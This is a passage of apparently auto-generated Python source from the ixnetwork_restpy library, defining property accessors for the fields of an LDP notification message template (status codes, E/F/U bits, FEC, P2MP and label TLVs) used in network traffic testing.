from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadPDULengthStatusData']))
@property
def UnknownMessageTypeEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownMessageTypeEBit']))
@property
def UnknownMessageTypeFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownMessageTypeFBit']))
@property
def UnknownMessageTypeStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000004
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownMessageTypeStatusData']))
@property
def BadMessageLengthEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadMessageLengthEBit']))
@property
def BadMessageLengthFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadMessageLengthFBit']))
@property
def BadMessageLengthStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000005
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadMessageLengthStatusData']))
@property
def UnknownTLVEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownTLVEBit']))
@property
def UnknownTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownTLVFBit']))
@property
def UnknownTLVStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000006
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownTLVStatusData']))
@property
def BadTLVLengthEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadTLVLengthEBit']))
@property
def BadTLVLengthFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadTLVLengthFBit']))
@property
def BadTLVLengthStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000007
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadTLVLengthStatusData']))
@property
def MalformedTLVValueEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MalformedTLVValueEBit']))
@property
def MalformedTLVValueFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MalformedTLVValueFBit']))
@property
def MalformedTLVValueStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000008
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MalformedTLVValueStatusData']))
@property
def HoldTimerExpiredEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HoldTimerExpiredEBit']))
@property
def HoldTimerExpiredFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HoldTimerExpiredFBit']))
@property
def HoldTimerExpiredStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000009
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HoldTimerExpiredStatusData']))
@property
def ShutdownEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ShutdownEBit']))
@property
def ShutdownFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ShutdownFBit']))
@property
def ShutdownStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000A
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ShutdownStatusData']))
@property
def LoopDetectedEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LoopDetectedEBit']))
@property
def LoopDetectedFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LoopDetectedFBit']))
@property
def LoopDetectedStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000B
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LoopDetectedStatusData']))
@property
def UnknownFECEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownFECEBit']))
@property
def UnknownFECFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownFECFBit']))
@property
def UnknownFECStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000C
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnknownFECStatusData']))
@property
def NoRouteEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoRouteEBit']))
@property
def NoRouteFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoRouteFBit']))
@property
def NoRouteStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000D
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoRouteStatusData']))
@property
def NoLabelResourcesEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoLabelResourcesEBit']))
@property
def NoLabelResourcesFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoLabelResourcesFBit']))
@property
def NoLabelResourcesStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000E
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NoLabelResourcesStatusData']))
@property
def LabelResourcesAvailableEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelResourcesAvailableEBit']))
@property
def LabelResourcesAvailableFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelResourcesAvailableFBit']))
@property
def LabelResourcesAvailableStatusData(self):
"""
Display Name: Status data
Default Value: 0x000000F
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelResourcesAvailableStatusData']))
@property
def SessionRejectedNoHelloEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedNoHelloEBit']))
@property
def SessionRejectedNoHelloFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedNoHelloFBit']))
@property
def SessionRejectedNoHelloStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000010
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedNoHelloStatusData']))
@property
def SessionRejectedAdvertisementModeEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedAdvertisementModeEBit']))
@property
def SessionRejectedAdvertisementModeFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedAdvertisementModeFBit']))
@property
def SessionRejectedAdvertisementModeStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000011
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedAdvertisementModeStatusData']))
@property
def SessionRejectedMaxPDULengthEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedMaxPDULengthEBit']))
@property
def SessionRejectedMaxPDULengthFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedMaxPDULengthFBit']))
@property
def SessionRejectedMaxPDULengthStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000012
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedMaxPDULengthStatusData']))
@property
def SessionRejectedLabelRangeEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedLabelRangeEBit']))
@property
def SessionRejectedLabelRangeFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedLabelRangeFBit']))
@property
def SessionRejectedLabelRangeStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000013
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedLabelRangeStatusData']))
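# NOTE: the 'Exired' spelling in the KeepaliveTimerExired* properties below matches the
# corresponding _SDM_ATT_MAP keys consumed by _get_attribute().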
@property
def KeepaliveTimerExiredEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['KeepaliveTimerExiredEBit']))
@property
def KeepaliveTimerExiredFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['KeepaliveTimerExiredFBit']))
@property
def KeepaliveTimerExiredStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000014
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['KeepaliveTimerExiredStatusData']))
@property
def LabelRequestAbortedEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelRequestAbortedEBit']))
@property
def LabelRequestAbortedFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelRequestAbortedFBit']))
@property
def LabelRequestAbortedStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000015
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelRequestAbortedStatusData']))
@property
def MissingMessageParametersEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MissingMessageParametersEBit']))
@property
def MissingMessageParametersFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MissingMessageParametersFBit']))
@property
def MissingMessageParametersStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000016
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MissingMessageParametersStatusData']))
@property
def UnsupportedAddressFamilyEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnsupportedAddressFamilyEBit']))
@property
def UnsupportedAddressFamilyFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnsupportedAddressFamilyFBit']))
@property
def UnsupportedAddressFamilyStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000017
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnsupportedAddressFamilyStatusData']))
@property
def SessionRejectedBadKeepaliveTimeEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedBadKeepaliveTimeEBit']))
@property
def SessionRejectedBadKeepaliveTimeFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedBadKeepaliveTimeFBit']))
@property
def SessionRejectedBadKeepaliveTimeStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000018
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SessionRejectedBadKeepaliveTimeStatusData']))
@property
def InternalErrorEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InternalErrorEBit']))
@property
def InternalErrorFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InternalErrorFBit']))
@property
def InternalErrorStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000019
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InternalErrorStatusData']))
@property
def StatusTLVMessageID(self):
"""
Display Name: Message ID
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVMessageID']))
@property
def StatusTLVMessageType(self):
"""
Display Name: Message type
Default Value: 256
Value Format: decimal
Available enum values: Notification message, 1, Hello message, 256, Initialization message, 512, Keepalive message, 513, Address message, 768, Address withdraw message, 769, Label mapping message, 1024, Label request message, 1025, Label withdraw message, 1026, Label release message, 1027, Label abort request message, 1028
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVMessageType']))
@property
def TclLDPMpStatusTLVUBit(self):
"""
Display Name: U bit
Default Value: 1
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclLDPMpStatusTLVUBit']))
@property
def TclLDPMpStatusTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclLDPMpStatusTLVFBit']))
@property
def TclLDPMpStatusTLVTclType(self):
"""
Display Name: Type
Default Value: 0x0040
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclLDPMpStatusTLVTclType']))
@property
def TclLDPMpStatusTLVTclLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclLDPMpStatusTLVTclLength']))
@property
def TclCustomTypeTclType(self):
"""
Display Name: Type
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclCustomTypeTclType']))
@property
def TclCustomTypeTclLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclCustomTypeTclLength']))
@property
def TclCustomTypeTclValue(self):
"""
Display Name: Value
Default Value: 0x00
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclCustomTypeTclValue']))
@property
def FecTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FecTLVUBit']))
@property
def FecTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FecTLVFBit']))
@property
def FecTLVType(self):
"""
Display Name: Type
Default Value: 0x0100
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FecTLVType']))
@property
def FecTLVLength(self):
"""
Display Name: Length
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FecTLVLength']))
@property
def TclP2mpTclType(self):
"""
Display Name: Type
Default Value: 0x06
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTclType']))
@property
def TclIpv4P2mpAddressTclP2mpAddressFamily(self):
"""
Display Name: Address Family
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv4P2mpAddressTclP2mpAddressFamily']))
@property
def TclIpv4P2mpAddressTclP2mpAddressLength(self):
"""
Display Name: Address length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv4P2mpAddressTclP2mpAddressLength']))
@property
def TclIpv4P2mpAddressTclRootAddress(self):
"""
Display Name: Root Node Address
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv4P2mpAddressTclRootAddress']))
@property
def TclIpv6P2mpAddressTclP2mpIpv6AddressFamily(self):
"""
Display Name: Address Family
Default Value: 2
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv6P2mpAddressTclP2mpIpv6AddressFamily']))
@property
def TclIpv6P2mpAddressTclP2mpIpv6AddressLength(self):
"""
Display Name: Address length
Default Value: 16
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv6P2mpAddressTclP2mpIpv6AddressLength']))
@property
def TclIpv6P2mpAddressTclIpv6RootAddress(self):
"""
Display Name: Root Node Address
Default Value: 0
Value Format: iPv6
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclIpv6P2mpAddressTclIpv6RootAddress']))
@property
def TclP2mpTclOpaqueLength(self):
"""
Display Name: Opaque Length
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTclOpaqueLength']))
@property
def TclGenericLSPIdentifierTLVTclType(self):
"""
Display Name: Type
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclGenericLSPIdentifierTLVTclType']))
@property
def TclGenericLSPIdentifierTLVTclLength(self):
"""
Display Name: Length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclGenericLSPIdentifierTLVTclLength']))
@property
def TclGenericLSPIdentifierTLVTclValue(self):
"""
Display Name: Value
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclGenericLSPIdentifierTLVTclValue']))
@property
def TclEditTLVTclType(self):
"""
Display Name: Type
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclEditTLVTclType']))
@property
def TclEditTLVTclLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclEditTLVTclLength']))
@property
def TclEditTLVTclValue(self):
"""
Display Name: Value
Default Value: 0x00
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclEditTLVTclValue']))
@property
def TclP2mpTypedWcardTclTypeTypedWcard(self):
"""
Display Name: Typed Wcard
Default Value: 0x00
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTypedWcardTclTypeTypedWcard']))
@property
def TclP2mpTypedWcardTclTypeWcard(self):
"""
Display Name: Type
Default Value: 0x06
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTypedWcardTclTypeWcard']))
@property
def TclP2mpTypedWcardTclTypeLen(self):
"""
Display Name: Len
Default Value: 2
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTypedWcardTclTypeLen']))
@property
def TclP2mpTypedWcardTclTypeAfi(self):
"""
Display Name: AFI
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TclP2mpTypedWcardTclTypeAfi']))
@property
def GenericLabelTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenericLabelTLVUBit']))
@property
def GenericLabelTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenericLabelTLVFBit']))
@property
def GenericLabelTLVType(self):
"""
Display Name: Type
Default Value: 0x0200
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenericLabelTLVType']))
@property
def GenericLabelTLVLength(self):
"""
Display Name: Length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenericLabelTLVLength']))
@property
def GenericLabelTLVLabel(self):
"""
Display Name: Label
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenericLabelTLVLabel']))
@property
def AtmLabelTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVUBit']))
@property
def AtmLabelTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVFBit']))
@property
def AtmLabelTLVType(self):
"""
Display Name: Type
Default Value: 0x0201
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVType']))
@property
def AtmLabelTLVLength(self):
"""
Display Name: Length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVLength']))
@property
def AtmLabelTLVReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmLabelTLVReserved']))
@property
def AtmLabelTLVVBits(self):
"""
Display Name: V bits
Default Value: 0
Value Format: decimal
Available enum values: VPI and VCI significant, 0, Only VPI significant, 1, Only VCI significant, 2
"""
